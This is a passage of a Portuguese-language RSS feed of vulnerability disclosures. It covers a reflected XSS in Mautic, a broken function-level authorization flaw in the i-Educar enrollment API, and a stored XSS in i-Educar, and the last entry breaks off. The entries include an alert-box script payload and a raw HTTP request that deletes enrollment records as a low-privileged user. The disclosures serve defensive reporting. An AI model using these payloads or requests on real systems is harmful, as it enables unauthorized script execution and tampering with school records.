&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt; do aplicativo Mautic. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo reflete essa entrada diretamente na resposta. Embora o servidor aplique a sanitização antes de armazenar os dados ou retorná-los posteriormente, o payload é executado imediatamente no navegador da vítima após a reflexão, permitindo que um invasor execute JavaScript arbitrário na sessão do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/mautic/mautic/security/advisories/GHSA-9v8p-m85m-f7mm&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/mautic/mautic/security/advisories/GHSA-9v8p-m85m-f7mm&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 03 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9760</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9760/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9760/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9760-broken-function-level-authorization-bfla-na-api-matricula-permite-a-exclusão-do-status-abandono&amp;#34;&amp;gt;CVE-2025-9760: Broken Function Level Authorization (BFLA) na API &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; permite a exclusão do status “abandono”
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9760&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9760&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade &amp;lt;b&amp;gt;Broken Function Level Authorization (BFLA)&amp;lt;/b&amp;gt; foi identificada na API &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; do aplicativo i-Educar. Esse problema permite que usuários com poucos privilégios excluam o status &amp;#34;abandono&amp;#34; (abandono) de matrículas arbitrárias de alunos manipulando parâmetros de solicitação.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;code&amp;gt;GET /module/Api/aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não aplica verificações de autorização para garantir que apenas usuários com privilégios (por exemplo, administradores) possam realizar operações confidenciais, como excluir um status de abandono. Ao alterar o parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;, um invasor pode afetar registros que não lhe pertencem.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9760-broken-function-level-authorization-bfla-na-api-matricula-permite-a-exclusão-do-status-abandono&amp;#34;&amp;gt;CVE-2025-9760: Broken Function Level Authorization (BFLA) na API &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; permite a exclusão do status “abandono”
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9760&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9760&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade &amp;lt;b&amp;gt;Broken Function Level Authorization (BFLA)&amp;lt;/b&amp;gt; foi identificada na API &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; do aplicativo i-Educar. Esse problema permite que usuários com poucos privilégios excluam o status &amp;#34;abandono&amp;#34; (abandono) de matrículas arbitrárias de alunos manipulando parâmetros de solicitação.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;code&amp;gt;GET /module/Api/aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não aplica verificações de autorização para garantir que apenas usuários com privilégios (por exemplo, administradores) possam realizar operações confidenciais, como excluir um status de abandono. Ao alterar o parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;, um invasor pode afetar registros que não lhe pertencem.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autenticar como um usuário sem privilégios.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9760/image.png&amp;#34;
	width=&amp;#34;1380&amp;#34;
	height=&amp;#34;528&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9760/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-9760/image_hu_374181a535d27950.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;627px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Enviar a seguinte requisição:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Api/matricula?&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;oper=delete&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;resource=abandono&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;id=206 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: application/json, text/javascript, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Observamos que a exclusão foi bem-sucedida.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9760/image-1.png&amp;#34;
	width=&amp;#34;1574&amp;#34;
	height=&amp;#34;542&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9760/image-1_hu_6621613282a2babf.png 480w, /p/cve-2025-9760/image-1_hu_7a7d76a95a6fa6ef.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;290&amp;#34;
		data-flex-basis=&amp;#34;696px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta é uma vulnerabilidade Broken Function Level Authorization (BFLA), conforme categorizado pelo OWASP API Security Top 10 (2023) - API4. As consequências incluem:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Adulteração de dados acadêmicos sem autorização.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda da integridade de dados em registros escolares.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Potenciais danos legais e à reputação de instituições de ensino.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9760.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9760.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9720</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9720/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9720/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9720-cross-site-scripting-xss-armazenado-no-endpoint-tabelaarredondamentoedit-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-9720: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9720&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9720&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9720-cross-site-scripting-xss-armazenado-no-endpoint-tabelaarredondamentoedit-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-9720: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9720&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9720&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;TabelaArredondamento/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
